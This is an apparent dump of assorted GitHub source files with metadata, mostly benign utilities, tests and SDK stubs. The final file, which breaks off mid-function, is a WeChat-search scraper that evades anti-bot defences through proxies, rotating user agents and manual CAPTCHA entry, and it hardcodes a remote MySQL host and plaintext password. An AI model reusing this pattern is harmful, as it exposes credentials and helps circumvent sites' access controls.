result = AST_MCTS.stress_test2(ast,macts_params,False)
else:
result = AST_MCTS.stress_test(ast,macts_params,False)
#reward, action_seq = result.rewards[1], result.action_seqs[1]
print("setp count: ",ast.step_count)
for (i,action_seq) in enumerate(result.action_seqs):
reward, _ = ASTSim.play_sequence(ast,action_seq,sleeptime=0.0)
print("predic reward: ",result.rewards[i])
print("actual reward: ",reward)
|
[
"xiaobaima@DNab421bb2.stanford.edu"
] |
xiaobaima@DNab421bb2.stanford.edu
|
f66d367cd6e818d2f464c01786bf01dada756def
|
fae0230fae5f2e762e299785cbd66ebf7330d937
|
/watchtower/_io.py
|
9474a5b819d01bd7b9c93eb35a3e6ecabc9bf44c
|
[] |
no_license
|
NelleV/watchtower
|
e4bb6c178cfaf9bf909018692662769153a64d2b
|
39b5ab198ed03cf4e0b11aa766683b244125bd58
|
refs/heads/master
| 2022-10-09T18:32:36.344014
| 2022-09-28T10:02:10
| 2022-09-28T10:02:10
| 80,778,407
| 1
| 3
| null | 2017-04-10T18:32:18
| 2017-02-02T23:19:39
|
Python
|
UTF-8
|
Python
| false
| false
| 651
|
py
|
import pandas as pd
import os
def _update_and_save(filename, raw, old_raw=None):
"""
"""
if old_raw is not None:
raw = pd.concat([raw, old_raw], ignore_index=True)
if "id" in raw.columns:
subset_column = "id"
elif "sha" in raw.columns:
subset_column = "sha"
else:
raise ValueError("No known column to distinguish subsets")
raw = raw.drop_duplicates(subset=[subset_column])
_save(filename, raw)
def _save(filename, raw):
try:
os.makedirs(os.path.dirname(filename))
except OSError:
pass
raw.to_json(filename, date_format="iso")
|
[
"nelle.varoquaux@gmail.com"
] |
nelle.varoquaux@gmail.com
|
c340f5ae35cb6ada1d2fe7cae70e4fcd2150d17a
|
ac5e52a3fc52dde58d208746cddabef2e378119e
|
/exps-gsn-edf/gsn-edf_ut=2.5_rd=0.8_rw=0.06_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=32/sched.py
|
95f1fd42aa48e0981658416011cf8039490df40a
|
[] |
no_license
|
ricardobtxr/experiment-scripts
|
1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1
|
7bcebff7ac2f2822423f211f1162cd017a18babb
|
refs/heads/master
| 2023-04-09T02:37:41.466794
| 2021-04-25T03:27:16
| 2021-04-25T03:27:16
| 358,926,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 294
|
py
|
-X FMLP -Q 0 -L 3 85 400
-X FMLP -Q 0 -L 3 62 200
-X FMLP -Q 0 -L 3 61 200
-X FMLP -Q 1 -L 2 55 300
-X FMLP -Q 1 -L 2 54 175
-X FMLP -Q 1 -L 2 35 200
-X FMLP -Q 2 -L 1 32 125
-X FMLP -Q 2 -L 1 25 100
-X FMLP -Q 3 -L 1 25 175
-X FMLP -Q 3 -L 1 22 100
14 150
10 250
|
[
"ricardo.btxr@gmail.com"
] |
ricardo.btxr@gmail.com
|
9ebb16b914fced04b98c5b6a064841ca987a4e17
|
ccf94dcb6b1500fcbbd56964ae8c4832a496b8b3
|
/python/baiduads-sdk-auto/test/test_negative_word_packet.py
|
2d84a0b0df973bbdbe590260f3d6719c3f2cf800
|
[
"Apache-2.0"
] |
permissive
|
baidu/baiduads-sdk
|
24c36b5cf3da9362ec5c8ecd417ff280421198ff
|
176363de5e8a4e98aaca039e4300703c3964c1c7
|
refs/heads/main
| 2023-06-08T15:40:24.787863
| 2023-05-20T03:40:51
| 2023-05-20T03:40:51
| 446,718,177
| 16
| 11
|
Apache-2.0
| 2023-06-02T05:19:40
| 2022-01-11T07:23:17
|
Python
|
UTF-8
|
Python
| false
| false
| 688
|
py
|
"""
dev2 api schema
'dev2.baidu.com' api schema # noqa: E501
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import baiduads
from baiduads.negativeword.model.negative_word_packet import NegativeWordPacket
class TestNegativeWordPacket(unittest.TestCase):
"""NegativeWordPacket unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testNegativeWordPacket(self):
"""Test NegativeWordPacket"""
# FIXME: construct object with mandatory attributes with example values
# model = NegativeWordPacket() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"tokimekiyxp@foxmail.com"
] |
tokimekiyxp@foxmail.com
|
5979042ecef7aab7fc251af4efd1c0f05b6ca7eb
|
9a28e0cecdf71cdb4eccdfc7df2554bd421fa69f
|
/src/hio/core/udp/udping.py
|
bff163c93346be5c63bb8cf904ea68b1a1ca4e35
|
[
"Apache-2.0"
] |
permissive
|
cellofellow/hio
|
a1700f3c8abc8100926dc4fc0af87efc294f6917
|
1296d196543ad01829dcb86844dfd5881af5a038
|
refs/heads/master
| 2023-04-04T01:27:01.449465
| 2021-04-08T17:26:01
| 2021-04-08T17:26:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,837
|
py
|
# -*- encoding: utf-8 -*-
"""
hio.core.udping Module
"""
import sys
import os
import errno
import socket
from binascii import hexlify
UDP_MAX_DATAGRAM_SIZE = (2 ** 16) - 1 # 65535
UDP_MAX_SAFE_PAYLOAD = 548 # IPV4 MTU 576 - udp headers 28
# IPV6 MTU is 1280 but headers are bigger
UDP_MAX_PACKET_SIZE = min(1024, UDP_MAX_DATAGRAM_SIZE) # assumes IPV6 capable equipment
class SocketUdpNb(object):
"""
Class to manage non blocking I/O on UDP socket.
"""
def __init__(self,
ha=None,
host='',
port=55000,
bufsize=1024,
wl=None,
bcast=False):
"""
Initialization method for instance.
ha = host address duple (host, port)
host = '' equivalant to any interface on host
port = socket port
bs = buffer size
path = path to log file directory
wl = WireLog instance ref for debug logging or over the wire tx and rx
bcast = Flag if True enables sending to broadcast addresses on socket
"""
self.ha = ha or (host, port) # ha = host address duple (host, port)
self.bs = bufsize
self.wl = wl
self.bcast = bcast
self.ss = None #server's socket needs to be opened
self.opened = False
def actualBufSizes(self):
"""
Returns duple of the the actual socket send and receive buffer size
(send, receive)
"""
if not self.ss:
return (0, 0)
return (self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF),
self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF))
def open(self):
"""
Opens socket in non blocking mode.
if socket not closed properly, binding socket gets error
socket.error: (48, 'Address already in use')
"""
#create socket ss = server socket
self.ss = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if self.bcast: # enable sending to broadcast addresses
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# make socket address reusable. doesn't seem to have an effect.
# the SO_REUSEADDR flag tells the kernel to reuse a local socket in
# TIME_WAIT state, without waiting for its natural timeout to expire.
# may want to look at SO_REUSEPORT
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF) < self.bs:
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.bs)
if self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF) < self.bs:
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.bs)
self.ss.setblocking(0) #non blocking socket
#bind to Host Address Port
try:
self.ss.bind(self.ha)
except socket.error as ex:
console.terse("socket.error = {0}\n".format(ex))
return False
self.ha = self.ss.getsockname() #get resolved ha after bind
self.opened = True
return True
def reopen(self):
"""
Idempotently open socket
"""
self.close()
return self.open()
def close(self):
"""
Closes socket and logs if any
"""
if self.ss:
self.ss.close() #close socket
self.ss = None
self.opened = False
def receive(self):
"""
Perform non blocking read on socket.
returns tuple of form (data, sa)
if no data then returns (b'',None)
but always returns a tuple with two elements
"""
try:
data, sa = self.ss.recvfrom(self.bs) # sa is source (host, port)
except socket.error as ex:
# ex.args[0] is always ex.errno for better compat
if ex.args[0] in (errno.EAGAIN, errno.EWOULDBLOCK):
return (b'', None) #receive has nothing empty string for data
else:
emsg = "socket.error = {0}: receiving at {1}\n".format(ex, self.ha)
console.profuse(emsg)
raise #re raise exception ex1
if console._verbosity >= console.Wordage.profuse: # faster to check
try:
load = data.decode("UTF-8")
except UnicodeDecodeError as ex:
load = "0x{0}".format(hexlify(data).decode("ASCII"))
cmsg = ("Server at {0}, received from {1}:\n------------\n"
"{2}\n\n".format(self.ha, sa, load))
console.profuse(cmsg)
if self.wl: # log over the wire rx
self.wl.writeRx(data, who=sa)
return (data, sa)
def send(self, data, da):
"""
Perform non blocking send on socket.
data is string in python2 and bytes in python3
da is destination address tuple (destHost, destPort)
"""
try:
result = self.ss.sendto(data, da) #result is number of bytes sent
except socket.error as ex:
emsg = "socket.error = {0}: sending from {1} to {2}\n".format(ex, self.ha, da)
console.profuse(emsg)
result = 0
raise
if console._verbosity >= console.Wordage.profuse:
try:
load = data[:result].decode("UTF-8")
except UnicodeDecodeError as ex:
load = "0x{0}".format(hexlify(data[:result]).decode("ASCII"))
cmsg = ("Server at {0}, sent {1} bytes to {2}:\n------------\n"
"{3}\n\n".format(self.ha, result, da, load))
console.profuse(cmsg)
if self.wl:
self.wl.writeTx(data[:result], who=da)
return result
PeerUdp = SocketUdpNb # alias
|
[
"smith.samuel.m@gmail.com"
] |
smith.samuel.m@gmail.com
|
3c52afe069397e41486a991fd1e98c2ef777447d
|
3d989666e6ceb2abc9175dcf7b1d0c1f8c76d205
|
/py_solution/p172_factorial_trailing_zeroes.py
|
2e88229ace7c046a24203162ad16036725347fd1
|
[] |
no_license
|
dengshilong/leetcode
|
00ae0898b4645efd1de69a13f2fa92606e899297
|
5ab258f04771db37a3beb3cb0c490a06183f7b51
|
refs/heads/master
| 2021-01-10T11:58:10.396399
| 2020-04-10T12:10:54
| 2020-04-10T12:10:54
| 47,912,974
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 480
|
py
|
class Solution(object):
def trailingZeroes(self, n):
"""
:type n: int
:rtype: int
"""
res = 0
while n >= 5:
temp = n // 5
res += temp
n = temp
return res
if __name__ == "__main__":
solution = Solution()
assert solution.trailingZeroes(3) == 0
assert solution.trailingZeroes(5) == 1
assert solution.trailingZeroes(10) == 2
assert solution.trailingZeroes(25) == 6
|
[
"dengshilong1988@gmail.com"
] |
dengshilong1988@gmail.com
|
2b7a2c90bae671eb7855d16bc122acb73d9dafdc
|
a16f3f148455395596405fd7b11df62932f3937d
|
/career/rabbit/send2.py
|
8701013073a594d7af24fe5ebb5aa71253c6e7c5
|
[] |
no_license
|
wyzane/skill-general
|
8eeb5984c42ec2bcb59c634c7f7bca7c2476977b
|
6e5a498dd5b63117a6a20aa81ac67a1999d8ac21
|
refs/heads/master
| 2020-05-22T21:51:18.061659
| 2019-10-18T15:56:26
| 2019-10-18T15:56:26
| 186,535,789
| 0
| 0
| null | 2019-10-18T15:52:54
| 2019-05-14T03:12:39
|
Python
|
UTF-8
|
Python
| false
| false
| 619
|
py
|
import sys
import pika
conn = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = conn.channel()
channel.queue_declare(queue='task_queue',
durable=True) # 消息持久化,重启rabbitmq消息不会丢失
message = ' '.join(sys.argv[1:]) or "hello world"
channel.basic_publish(exchange='',
routing_key='task_queue',
body=message,
properties=pika.BasicProperties(
delivery_mode=2, # 使消息持久化
))
print("send message: ", message)
conn.close()
|
[
"wyzane1207@163.com"
] |
wyzane1207@163.com
|
a51fd66e325e13d07571a0145b88b73ff676b50b
|
a2d36e471988e0fae32e9a9d559204ebb065ab7f
|
/huaweicloud-sdk-drs/huaweicloudsdkdrs/v3/model/update_database_object_req.py
|
698caaaa0fef8649ba108b232f7219fc181dd69a
|
[
"Apache-2.0"
] |
permissive
|
zhouxy666/huaweicloud-sdk-python-v3
|
4d878a90b8e003875fc803a61414788e5e4c2c34
|
cc6f10a53205be4cb111d3ecfef8135ea804fa15
|
refs/heads/master
| 2023-09-02T07:41:12.605394
| 2021-11-12T03:20:11
| 2021-11-12T03:20:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,360
|
py
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class UpdateDatabaseObjectReq:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'job_id': 'str',
'selected': 'bool',
'sync_database': 'bool',
'job': 'list[DatabaseInfo]'
}
attribute_map = {
'job_id': 'job_id',
'selected': 'selected',
'sync_database': 'sync_database',
'job': 'job'
}
def __init__(self, job_id=None, selected=None, sync_database=None, job=None):
"""UpdateDatabaseObjectReq - a model defined in huaweicloud sdk"""
self._job_id = None
self._selected = None
self._sync_database = None
self._job = None
self.discriminator = None
self.job_id = job_id
if selected is not None:
self.selected = selected
if sync_database is not None:
self.sync_database = sync_database
if job is not None:
self.job = job
@property
def job_id(self):
"""Gets the job_id of this UpdateDatabaseObjectReq.
任务ID
:return: The job_id of this UpdateDatabaseObjectReq.
:rtype: str
"""
return self._job_id
@job_id.setter
def job_id(self, job_id):
"""Sets the job_id of this UpdateDatabaseObjectReq.
任务ID
:param job_id: The job_id of this UpdateDatabaseObjectReq.
:type: str
"""
self._job_id = job_id
@property
def selected(self):
"""Gets the selected of this UpdateDatabaseObjectReq.
是否进行对象选择,是:自定义迁移对象,否:全部迁移,不填默认为否。
:return: The selected of this UpdateDatabaseObjectReq.
:rtype: bool
"""
return self._selected
@selected.setter
def selected(self, selected):
"""Sets the selected of this UpdateDatabaseObjectReq.
是否进行对象选择,是:自定义迁移对象,否:全部迁移,不填默认为否。
:param selected: The selected of this UpdateDatabaseObjectReq.
:type: bool
"""
self._selected = selected
@property
def sync_database(self):
"""Gets the sync_database of this UpdateDatabaseObjectReq.
是否库级同步
:return: The sync_database of this UpdateDatabaseObjectReq.
:rtype: bool
"""
return self._sync_database
@sync_database.setter
def sync_database(self, sync_database):
"""Sets the sync_database of this UpdateDatabaseObjectReq.
是否库级同步
:param sync_database: The sync_database of this UpdateDatabaseObjectReq.
:type: bool
"""
self._sync_database = sync_database
@property
def job(self):
"""Gets the job of this UpdateDatabaseObjectReq.
数据对象选择信息,selected为true时必填。
:return: The job of this UpdateDatabaseObjectReq.
:rtype: list[DatabaseInfo]
"""
return self._job
@job.setter
def job(self, job):
"""Sets the job of this UpdateDatabaseObjectReq.
数据对象选择信息,selected为true时必填。
:param job: The job of this UpdateDatabaseObjectReq.
:type: list[DatabaseInfo]
"""
self._job = job
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UpdateDatabaseObjectReq):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
3642d4130b2a6948154873329d6f8ed1f4a69df7
|
4f408d65db60911f56110c351cb3b64835e0c5fb
|
/caffe2/python/net_printer_test.py
|
2d6f5a172326cc0d170bb65254e0db72b09f873c
|
[
"Apache-2.0",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] |
permissive
|
KeyKy/caffe2_SSD
|
a02c065aef2dbcfd00faae8be0440d7a4ff0fb76
|
7235688ea5e212dbe8609d780dd94c8c7d9fef54
|
refs/heads/master
| 2021-09-18T14:36:11.247427
| 2018-07-10T09:59:35
| 2018-07-10T09:59:35
| 89,928,918
| 8
| 5
| null | 2018-07-27T02:14:38
| 2017-05-01T14:04:20
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,901
|
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import net_printer
from caffe2.python.checkpoint import Job
from caffe2.python.net_builder import ops
from caffe2.python.task import Task, final_output
import unittest
def example_loop():
with Task():
total = ops.Const(0)
total_large = ops.Const(0)
total_small = ops.Const(0)
total_tiny = ops.Const(0)
with ops.loop(10) as loop:
outer = ops.Mul([loop.iter(), ops.Const(10)])
with ops.loop(loop.iter()) as inner:
val = ops.Add([outer, inner.iter()])
with ops.If(ops.GE([val, ops.Const(80)])) as c:
ops.Add([total_large, val], [total_large])
with c.Elif(ops.GE([val, ops.Const(50)])) as c:
ops.Add([total_small, val], [total_small])
with c.Else():
ops.Add([total_tiny, val], [total_tiny])
ops.Add([total, val], total)
def example_task():
with Task():
with ops.task_init():
one = ops.Const(1)
two = ops.Add([one, one])
with ops.task_init():
three = ops.Const(3)
accum = ops.Add([two, three])
# here, accum should be 5
with ops.task_exit():
# here, accum should be 6, since this executes after lines below
seven_1 = ops.Add([accum, one])
six = ops.Add([accum, one])
ops.Add([accum, one], [accum])
seven_2 = ops.Add([accum, one])
o6 = final_output(six)
o7_1 = final_output(seven_1)
o7_2 = final_output(seven_2)
return o6, o7_1, o7_2
def example_job():
with Job() as job:
with job.init_group:
example_loop()
example_task()
return job
class TestNetPrinter(unittest.TestCase):
def test_print(self):
self.assertTrue(len(net_printer.to_string(example_job())) > 0)
def test_valid_job(self):
job = example_job()
with job:
with Task():
# distributed_ctx_init_* ignored by analyzer
ops.Add(['distributed_ctx_init_a', 'distributed_ctx_init_b'])
net_printer.analyze(example_job())
def test_undefined_blob(self):
job = example_job()
with job:
with Task():
ops.Add(['a', 'b'])
with self.assertRaises(AssertionError):
net_printer.analyze(job)
def test_multiple_definition(self):
job = example_job()
with job:
with Task():
ops.Add([ops.Const(0), ops.Const(1)], 'out1')
with Task():
ops.Add([ops.Const(2), ops.Const(3)], 'out1')
with self.assertRaises(AssertionError):
net_printer.analyze(job)
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
549746b4c2e4c7057bd7732d19f58753950efb1d
|
5a3c4b802ea7d5ce380c38415929ebaa8799eb06
|
/tests/test_analyze_gifs.py
|
700b9bad30c536d79dd4ab352c4a24dcff1e0a73
|
[
"MIT"
] |
permissive
|
get-wrecked/gifalyzer
|
fe18855c83b2b9e2188faef92b317fa81e913b4d
|
0731d03766cfecf3fc6c64cc17022563da09b85b
|
refs/heads/master
| 2022-04-10T10:57:35.602500
| 2019-06-10T22:32:04
| 2019-06-10T22:32:04
| 93,275,859
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 514
|
py
|
import os
import pytest
from gifalyzer import analyze_gif
def test_analyze_gifs_normal():
report = analyze_gif(get_sample('200x202-26-130-130-0.gif'))
assert report['dimensions'] == (200, 202)
assert report['frame_count'] == 26
assert report['frame_delay_ms'] == 130
assert report['last_frame_delay_ms'] == 130
assert report['loop'] == 0
def get_sample(sample_name):
sample_dir = os.path.join(os.path.dirname(__file__), 'samples')
return os.path.join(sample_dir, sample_name)
|
[
"git@thusoy.com"
] |
git@thusoy.com
|
ee57158af40112b19388d679d38127b30806d32a
|
c9ad6ad969de505b3c8471c6f46dfd782a0fb498
|
/0x05-python-exceptions/0-safe_print_list.py
|
16119623870bda212d1982f12fcd78d50aa22dde
|
[] |
no_license
|
enterpreneur369/holbertonschool-higher_level_programming
|
002fd5a19b40c8b1db06b34c4344e307f24c17ac
|
dd7d3f14bf3bacb41e2116d732ced78998a4afcc
|
refs/heads/master
| 2022-06-20T00:57:27.736122
| 2020-05-06T14:26:10
| 2020-05-06T14:26:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
#!/usr/bin/python3
""" safe_print_list
Python function to print the elements of a list
"""
def safe_print_list(my_list=[], x=0):
i, p = 0, 0
try:
for i in range(x):
print("{}".format(my_list[i]), end="")
p = p + 1
except IndexError as err:
pass
finally:
print()
return (p)
|
[
"jose.calderon@holbertonschool.com"
] |
jose.calderon@holbertonschool.com
|
8a1230827541d821262fb3f1280ea53c87565736
|
8c618e16b15ad33a6ab6dcc4e0511e7a3acba094
|
/remcall/schema/__init__.py
|
8eb3a63f088ff55fb93ab052c031ca2d24a80f9d
|
[
"MIT"
] |
permissive
|
luphord/remcall
|
0bef9bbf13be697645f7b93fbd9a5e3ee9afd97b
|
31419ff0f5c21ea2d90f9cabdaec85b6eebcaa12
|
refs/heads/trunk
| 2021-12-25T23:44:39.888706
| 2021-12-03T08:15:58
| 2021-12-03T08:15:58
| 165,920,464
| 0
| 0
|
MIT
| 2021-12-03T08:15:59
| 2019-01-15T20:42:12
|
Python
|
UTF-8
|
Python
| false
| false
| 634
|
py
|
from .core import Type, Interface, Enum, Record, Primitive, Method, \
string, int8, int16, int32, int64, uint8, uint16, \
uint32, uint64, float32, float64, void, boolean, \
date, datetime, time, primitive_types, Array, Schema
from .base import assert_name
__all__ = ['Type', 'Interface', 'Enum', 'Record', 'Primitive', 'Method',
'string', 'int8', 'int16', 'int32', 'int64', 'uint8', 'uint16',
'uint32', 'uint64', 'float32', 'float64', 'void', 'boolean',
'date', 'datetime', 'time', 'assert_name', 'primitive_types',
'Array', 'Schema']
|
[
"luphord@protonmail.com"
] |
luphord@protonmail.com
|
7dd54bed4c22108fdd325ab8efa1459e4fdd1d11
|
a47192d5abd5f34f63b2c0e27b954ae07de47302
|
/day20/range.py
|
d17de1cba89cc621b63647419a191c9a16be7aa0
|
[] |
no_license
|
Godsmith/adventofcode2016
|
46639af6e015f0a024cde32ba0a1f98268899f4f
|
e036fb68bb53b9c79aa143b6c4645db218f77862
|
refs/heads/master
| 2020-06-15T04:21:21.012830
| 2017-01-10T21:52:30
| 2017-01-10T21:52:30
| 75,330,889
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 641
|
py
|
class Range:
def __init__(self, low, high):
self.low = low
self.high = high
def __repr__(self):
return 'Range<%s-%s>' % (self.low, self.high)
def __hash__(self):
return hash(tuple([self.low, self.high]))
def __eq__(self, other):
return self.low == other.low and self.high == other.high
@classmethod
def combine(cls, ranges):
lowest = min([r.low for r in ranges])
highest = max([r.high for r in ranges])
return cls(lowest, highest)
def can_be_combined(self, range_):
return not (self.high < range_.low - 1 or self.low > range_.high + 1)
|
[
"filip.lange@gmail.com"
] |
filip.lange@gmail.com
|
cc748c6aadec1a2627e7132cfd476d19c690933c
|
f7127398e6bc60cdece53014dfebb58aa99c0fbd
|
/aiogram_dialog/widgets/kbd/checkbox.py
|
b6a4e010a29614fdc9277b51a146f248f8d6f885
|
[] |
no_license
|
drforse/aiogram_dialog
|
25fcae2579e9b37c43a41303232d009e04316c6a
|
984496ee7818d7896235d20f30bb662f56293385
|
refs/heads/master
| 2023-02-28T21:39:53.331894
| 2021-02-05T05:50:15
| 2021-02-05T05:50:15
| 336,158,550
| 0
| 0
| null | 2021-02-05T03:58:44
| 2021-02-05T03:58:43
| null |
UTF-8
|
Python
| false
| false
| 1,300
|
py
|
from typing import Callable, Optional, Union, Dict, Awaitable
from aiogram.types import CallbackQuery
from aiogram_dialog.manager.manager import DialogManager
from aiogram_dialog.widgets.text import Text, Case
from .button import Button
OnStateChanged = Callable[[CallbackQuery, "Checkbox", DialogManager], Awaitable]
class Checkbox(Button):
def __init__(self, checked_text: Text, unchecked_text: Text,
id: str,
on_state_changed: Optional[OnStateChanged] = None,
when: Union[str, Callable] = None):
text = Case({True: checked_text, False: unchecked_text}, selector=self._is_text_checked)
super().__init__(text, id, self._on_click, when)
self.on_state_changed = on_state_changed
async def _on_click(self, c: CallbackQuery, button: Button, manager: DialogManager):
manager.context.set_data(self.widget_id, not self.is_checked(manager), internal=True)
if self.on_state_changed:
await self.on_state_changed(c, self, manager)
def _is_text_checked(self, data: Dict, case: Case, manager: DialogManager) -> bool:
return self.is_checked(manager)
def is_checked(self, manager: DialogManager) -> bool:
return manager.context.data(self.widget_id, False, internal=True)
|
[
"tishka17@mail.ru"
] |
tishka17@mail.ru
|
fef0f186e3b388ef8dbb58d698766de6b8a4cbb0
|
dee9432b12b8d5667ba3f58889344f89a032229d
|
/food/robots.py
|
62e74a1df46393c50327b29f48029c5a8199bdf9
|
[] |
no_license
|
rolllyroman/lucas
|
a39743d697483f962617428bc61bfc053e9b4095
|
e219ed3fc69ad36132ac4361c1766b279269323c
|
refs/heads/master
| 2020-04-16T06:48:55.329438
| 2019-01-24T06:20:44
| 2019-01-24T06:20:44
| 150,229,829
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,006
|
py
|
#coding:utf-8
import requests
import time
from lxml import etree
import json
# import MySQLdb
import pymysql
import random
import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )
from constant import USER_AGENT
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chromeOptions = webdriver.ChromeOptions()
# 设置代理
chromeOptions.add_argument("--proxy-server=http://112.85.167.11:9999")
# 一定要注意,=两边不能有空格,不能是这样--proxy-server = http://202.20.16.82:10152
driver = webdriver.Chrome(chrome_options = chromeOptions)
# 设置无头
# chrome_options = Options()
# chrome_options.add_argument('--headless')
# driver = webdriver.Chrome(chrome_options=chrome_options)
# driver = webdriver.Chrome()
HEADERS = {'Accept': 'text/html, application/xhtml+xml, image/jxr, */*',
'Accept-Language':'zh-Hans-CN, zh-Hans; q=0.5',
'Connection':'Keep-Alive',
# 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'}
'User-Agent':random.choice(USER_AGENT),
}
BASIC_URL = "https://weixin.sogou.com/weixin?query=%s&_sug_type_=&s_from=input&_sug_=n&type=1&page=%s&ie=utf8"
conn = pymysql.connect(host="119.23.52.3",user="root",passwd="168mysql",db="haha",charset="utf8")
conn.autocommit(1) # conn.autocommit(True)
cursor = conn.cursor()
proxies_queue = []
# def put_proxy_queue():
# url = "https://proxyapi.mimvp.com/api/fetchsecret.php?orderid=862060912114100297&num=5&http_type=3&result_fields=1,2,3"
# resp = requests.get(url)
# content = resp.content
# datas = content.split('\r\n')
# for data in datas:
# http_ip = data.split(',')[0]
# https_ip = http_ip.split(":")[0] + data.split(',')[-1]
# proxies = {
# "http":http_ip,
# "https":https_ip,
# }
# try:
# print "测试结果:%s"%requests.get("http://www.baidu.com",proxies=proxies)
# except:
# print "失败proxies:%s"%proxies
# else:
# proxies_queue.append(proxies)
# print "now proxies_queue:%s"%proxies_queue
# def get_proxies():
# print "now proxies_queue:%s"%proxies_queue
# if len(proxies_queue) < 20:
# for i in range(1,6):
# print "wait for put proxy... %s"%i
# time.sleep(1)
# put_proxy_queue()
# res = random.choice(proxies_queue)
# try:
# requests.get("http://www.baidu.com",proxies=res)
# except:
# proxies_queue.remove(res)
# return get_proxies()
# else:
# return res
def if_list_code(weixins,detail_srcs):
if len(weixins) == 1:
code = raw_input("请输入验证码:")
code_label = driver.find_element_by_name("c")
code_label.send_keys(" ") # 防止发送不成功
code_label.clear()
code_label.send_keys(code)
submit_label = driver.find_element_by_id("submit")
submit_label.click()
time.sleep(1)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
weixins = html.xpath("//label/text()")
detail_srcs = html.xpath("//li//div/p[@class='tit']/a/@href")
print "weixins:%s"%weixins
if len(weixins) == 1:
return if_list_code(weixins,detail_srcs)
return weixins,detail_srcs
def search_list(word):
print "search_list:%s"%word
for i in range(1,11):
url = BASIC_URL%(word,i)
# resp = requests.get(url,headers=HEADERS)
driver.get(url)
time.sleep(1)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
# print resp.content.decode()
# print "============="
# print url
# print "============="
# print resp.status_code
weixins = html.xpath("//label/text()")
detail_srcs = html.xpath("//li//div/p[@class='tit']/a/@href")
weixins,detail_srcs = if_list_code(weixins,detail_srcs)
if not weixins:
break
deal_detail(weixins,detail_srcs)
def get_words():
words = set()
url = "https://hanyu.baidu.com/s?wd=%E7%99%BE%E5%AE%B6%E5%A7%93&from=poem"
resp = requests.get(url,headers=HEADERS)
resp.encoding = "utf-8"
html = resp.text
for w in html:
words.add(w)
return words
def main():
print "main start..."
words = get_words()
for w in words:
sql = "select word from got_word where word = %s"
cursor.execute(sql,(w,))
if cursor.fetchone():
print "%s 已搜过,跳过..."%w
continue
print "开始搜索:%s"%w
search_list(w)
sql = "insert into got_word(word) values(%s)"
cursor.execute(sql,(w,))
def if_detail_code(heads,names):
# 弹出详情验证码
if not names:
code = raw_input("请输入验证码:")
code_label = driver.find_element_by_id("input")
code_label.send_keys(" ") # 防止发送不成功
code_label.clear()
code_label.send_keys(code)
submit_label = driver.find_element_by_id("bt")
submit_label.click()
time.sleep(1)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
heads = html.xpath("//div//span/img/@src")
names = html.xpath("//strong/text()")
if not names:
return if_detail_code(heads,names)
return heads,names
def deal_detail(weixins,detail_srcs):
print "deal_detail start..."
for i,weixin in enumerate(weixins):
sql = "select weixin from robot where weixin = %s"
cursor.execute(sql,(weixin,))
res = cursor.fetchone()
if res:
continue
src = detail_srcs[i]
# 详情名字和头像
# resp = requests.get(src,headers=HEADERS)
# html = etree.HTML(resp.content)
driver.get(src)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
